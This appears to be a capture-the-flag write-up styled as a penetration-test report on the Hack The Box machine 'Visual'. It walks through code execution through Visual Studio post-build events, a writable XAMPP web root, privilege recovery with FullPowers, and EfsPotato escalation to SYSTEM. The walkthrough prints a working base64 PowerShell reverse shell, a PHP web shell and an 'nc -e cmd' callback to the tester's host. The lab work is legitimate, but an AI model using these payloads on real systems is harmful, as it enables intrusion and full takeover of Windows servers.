Visual - Pentest Report

Executive Summary

HackTheBox contracted Otrashoui Cybersecurity Services™ to perform a Network Penetration Test of one of Hack The Box’s internal hosts to identify security weaknesses, determine the impact to HackTheBox, and provide remediation recommendations.

Approach

Otrashoui Cybersecurity Services™ performed testing under a “black box” approach without credentials or any prior knowledge of HackTheBox’s environment.

Scope

Host Description
10.10.11.234 Visual Web Server

Assessment Overview and Recommendations

During the Penetration test against HackTheBox, Otrashoui Cybersecurity Services™ identified two (2) findings that affect HackTheBox’s information security posture.

The first finding involved a Remote Code Execution triggered when the web application builds the user-provided Visual Studio project. This results in access to the local system, allowing an attacker to view potentially sensitive data. This vulnerability can be fixed by hardening the web application and build pipeline, for example by ignoring build events.

The second finding involved insecure file permissions on the web server folder. These permissions allow any user on the system to view, modify and remove any files or folders of the web application. This can be used by attackers to modify the web application to include malicious functionality, or cause a outage. Permissions on sensitive locations on the system should be reviewed and hardened, to only allow access to trusted and necessary users.

Summary of Findings

The following table presents a summary of findings by severity level:

High Medium Low Total
2 0 0 2

Below is a high-level overview of each finding identified during the assessment. These findings are covered in depth in the Technical Findings Details section of this report:

Name Severity
Remote Code Execution via Visual Studio Project High
Insecure File Permissions High

Exploitation Walkthrough

During the course of the assessment, Otrashoui Cybersecurity Services™ was able to gain a foothold and compromise the in-scope host. The steps below demonstrate how the tester went from unauthenticated user to administrative access on the host.

Detailed Walkthrough

  1. The tester was able to get remote code execution by create a git repository containing a malicious Visual Studio project using post-build events.
  2. The tester found that the web root C:\xampp\htdocs has permissions allowing any user to add/remove/modify files.
  3. By placing a PHP file in the web root, it was possible to execute commands as the NT AUTHORITY\LOCAL SERVICE user.
  4. This service account had most of its original privileges disabled, but using a technique involving creating a scheduled task, it was possible to recover them, including the dangerous SeImpersonatePrivilege.
  5. This privilege allowed the tester to achieve full administrative access by using one variation of the potato exploits (EfsPotato).

Reproduction Steps

In the following code snippets, [...] is used to discard irrelevant output in the current context. Additionally, lines starting with the $ character indicate a system command typed by the tester.

Here is the reverse shell payload:

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Initialize a git repository inside the project folder and run git update-server-info to make it clone-able:

$ git init
Initialized empty Git repository in /tmp/Visual-RCE/.git/

$ git update-server-info

Inside the project folder, serve the .git directory using python’s built-in http.server module:

$ sudo python3 -m http.server -d .git 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
    

Some time after submitting the URL to the git repository, the reverse shell is received:

$ rlwrap nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.119.24:49708.

PS C:\Windows\Temp\11ac1e51470a88ca33c158f79e5699>
PS C:\xampp> icacls C:\xampp\htdocs
C:\xampp\htdocs Everyone:(OI)(CI)(F)
                Everyone:(I)(OI)(CI)(F)
                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                BUILTIN\Users:(I)(OI)(CI)(RX)
                BUILTIN\Users:(I)(CI)(AD)
                BUILTIN\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

It is possible to obtain a reverse shell as the NT AUTHORITY\LOCAL SERVICE user by placing a PHP file in the web root containing the same payload as above:

<?php system("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="); ?>

This user only has a few privileges:

PS C:\programdata> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeCreateGlobalPrivilege       Create global objects          Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

According to Microsoft’s documentation, this account should have more privileges, including the powerful SeImpersonate.

We can use a technique described in this blog post to get those privileges back. It involves creating a scheduled task as the NT AUTHORITY\LOCAL SERVICE user, which will run with the normal set of privileges. The blog author created a tool to facilitate this process:

PS C:\programdata> .\FullPowers.exe -c 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQA1ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='

The payload is once again the same base64 encoded PowerShell reverse shell.

After executing the command, the reverse shell is received, and the privileges are present:

$ nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.119.24:49740.

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

With the SeImpersonatePrivilege, it is possible to escalate to NT AUTHORITY\SYSTEM using one of the Potato exploits.

The tester used EFS Potato, from this Github repository. There is no compiled binary available, so it is necessary to clone the repository on a Windows system and build it manually.

After doing so, transfer the executable to the target system and run it:

C:\ProgramData>efs.exe -p "C:\ProgramData\nc.exe" -a "10.10.14.95 443 -e cmd"
efs.exe -p "C:\ProgramData\nc.exe" -a "10.10.14.95 443 -e cmd"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c0618fef-c0f3-430f-a4e5-57c10429497f/\c0618fef-c0f3-430f-a4e5-57c10429497f\c0618fef-c0f3-430f-a4e5-57c10429497f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

For some reason, the PowerShell reverse shell paylaod didn’t work, so the tester uploaded nc.exe to establish the reverse shell instead.

Shortly after executing the command above, the reverse shell as NT AUTHORITY\SYSTEM is catched:

Microsoft Windows [Version 10.0.17763.4840]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
VISUAL

Remediation Summary

Short Term

Medium Term

Long Term

Technical Findings Details

1. Remote Code Execution via Visual Studio Project - High

CWE 892
CVSS 3.1 Score 9.8
Affected Host 10.10.11.234
Description It is possible to execute arbitrary code on the server by creating a git repository containing a malicious Visual Studio project.
Impact The remote code execution gives attackers access to the local filesystem, as well as the internal network, giving them more opportunities to further compromise the enterprise.
Remediation Disable pre and post-build events.
External References https://learn.microsoft.com/en-us/visualstudio/ide/how-to-specify-build-events-csharp?view=vs-2022

Evidence

Initialize a git repository inside the project folder and run git update-server-info to make it clone-able:

$ git init
Initialized empty Git repository in /tmp/Visual-RCE/.git/

$ git update-server-info

Inside the project folder, serve the .git directory using python’s built-in http.server module:

$ sudo python3 -m http.server -d .git 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Submit the URL to the malicious git repository to the web application. After some time, the post-build event gets executed and the request from curl.exe is received:

[...]
10.129.131.221 - - [01/Oct/2023 00:52:51] "GET /ITWORKS HTTP/1.1" 404 -

It is possible to modify the post-build event to obtain a reverse shell to get remote access to the underlying server.

2. Insecure File Permissions - High

CWE 732
CVSS 3.1 Score 8.0
Affected Host 10.10.11.234
Description File permissions on the C:\xampp\htdocs web root folder allow any user to add, modify or remove files and folders.
Impact An attacker can use these permissions to gain access to a sensitive service account, bring the service down, add malicious functionality targeting the users of the application, or retrieve sensitive data.
Remediation Harden the file permissions of important locations on the system, by restricting the access to trusted users only.
External References https://ss64.com/nt/icacls.html

Evidence

Inspect file permissions using the icalcs Windows utility:

PS C:\xampp> icacls C:\xampp\htdocs
C:\xampp\htdocs Everyone:(OI)(CI)(F)
                Everyone:(I)(OI)(CI)(F)
                NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                BUILTIN\Administrators:(I)(OI)(CI)(F)
                BUILTIN\Users:(I)(OI)(CI)(RX)
                BUILTIN\Users:(I)(CI)(AD)
                BUILTIN\Users:(I)(CI)(WD)
                CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

Everyone has Full Control (F) on C:\xampp\htdocs.

Create a simple PHP script to execute system commands:

<?php system("whoami /all"); ?>

Note that the PHP script has to be created on a Linux or MacOS system, as files in the default Windows encoding (UTF-16LE) won’t get executed by Apache.

After transferring the file to the target system and placing it in the web root (C:\xampp\htdocs), it is possible to execute commands as the NT AUTHORITY\LOCAL SERVICE user: